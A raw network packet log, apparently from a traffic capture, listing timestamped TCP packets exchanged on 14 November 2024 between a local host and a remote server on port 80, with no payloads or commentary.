                                                                                        Nov 14, 2024 08:15:36.603863001 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.603880882 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604043961 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604054928 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604069948 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604082108 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604093075 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604093075 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604114056 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604149103 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604176998 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604190111 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604202032 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604240894 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604368925 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604383945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604393959 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604408979 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604414940 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604420900 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604432106 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604443073 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604459047 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604505062 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604516029 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604526043 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604537010 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604545116 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604556084 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604557991 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604604959 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604635954 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604649067 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604660988 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604681015 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604829073 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604841948 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604852915 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604865074 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604867935 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604876041 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604887962 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.604892969 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.604918003 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605092049 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605103016 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605114937 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605125904 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605134010 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605148077 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605230093 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605241060 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605249882 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605262995 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605273008 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605299950 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605360031 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605376959 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605389118 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605401039 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605402946 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605426073 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605561972 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605573893 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605583906 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605597973 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605601072 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605611086 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605613947 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605618000 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605623007 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605643988 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605657101 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605700970 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605710983 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605721951 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605741978 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605750084 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605762005 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605789900 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605889082 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605901957 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605911016 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605921984 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605933905 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605936050 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605945110 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.605961084 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.605976105 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606040955 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606053114 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606065035 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606076956 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606079102 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606087923 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606097937 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606101990 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606117010 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606123924 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606131077 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606132984 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606137991 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606146097 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606148005 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606175900 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606343985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606357098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606401920 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606483936 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606497049 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606508970 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606524944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606528997 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606533051 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606539965 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606547117 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606549025 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606568098 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606591940 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606628895 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606640100 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606652021 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606669903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606678009 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606683016 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606692076 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606718063 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606822014 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606833935 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606842995 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606853962 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606863022 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606865883 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606877089 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.606898069 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606919050 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.606988907 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607001066 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607013941 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607026100 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607038021 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.607057095 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.607142925 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607153893 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607187986 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.607280016 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607292891 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607302904 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607320070 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.607322931 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.607357979 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.731842041 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.731911898 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.731950045 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732009888 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732017040 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732022047 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732033968 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732049942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732059002 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732059002 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732074022 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732090950 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732106924 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732124090 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732130051 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732146978 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732146978 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732165098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732171059 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732182026 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732183933 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732196093 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732207060 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732211113 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732218027 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732228994 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732232094 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732239962 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732251883 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732254982 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732310057 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732507944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732521057 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732532024 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732558966 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732564926 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732577085 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732584000 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732588053 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732600927 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732611895 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732611895 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732625008 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732635975 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732636929 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732647896 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732660055 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732676029 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732687950 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732687950 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732698917 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732713938 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732718945 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732724905 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732733965 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732737064 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732748985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732765913 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732774019 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732774973 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732779980 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732785940 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.732801914 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.732831955 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733318090 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733330965 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733354092 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733371973 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733377934 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733383894 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733397007 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733409882 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733414888 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733424902 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733433008 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733437061 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733450890 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733453989 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733460903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733462095 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733464003 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733469963 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733475924 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733488083 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733494997 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733500957 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733514071 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733525038 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733525991 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733540058 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733547926 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733551979 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733563900 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733575106 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733587027 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733587027 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733608961 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733630896 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.733987093 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.733999014 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734010935 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734025955 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734035969 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734061956 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734138966 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734152079 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734164000 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734174967 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734185934 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734198093 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734200954 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734210014 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734220982 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734224081 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734234095 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734244108 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734246969 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734256983 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734261036 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734272957 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734286070 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734294891 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734298944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734311104 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734312057 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734348059 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734752893 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734766006 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734776974 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734790087 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734800100 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734802961 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734812975 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734813929 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734827042 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734838009 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734838009 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734850883 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734864950 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734873056 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734877110 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.734888077 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.734916925 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735102892 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735115051 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735126972 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735140085 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735153913 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735153913 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735165119 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735179901 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735183001 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735186100 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735192060 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735193968 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735205889 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735238075 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735295057 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735327959 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735330105 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735341072 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735361099 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735373974 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735377073 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735388994 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735393047 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735399961 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735410929 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735415936 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735424042 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735434055 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.735440969 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735456944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735469103 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.735471010 CET4970480192.168.2.5103.20.102.62
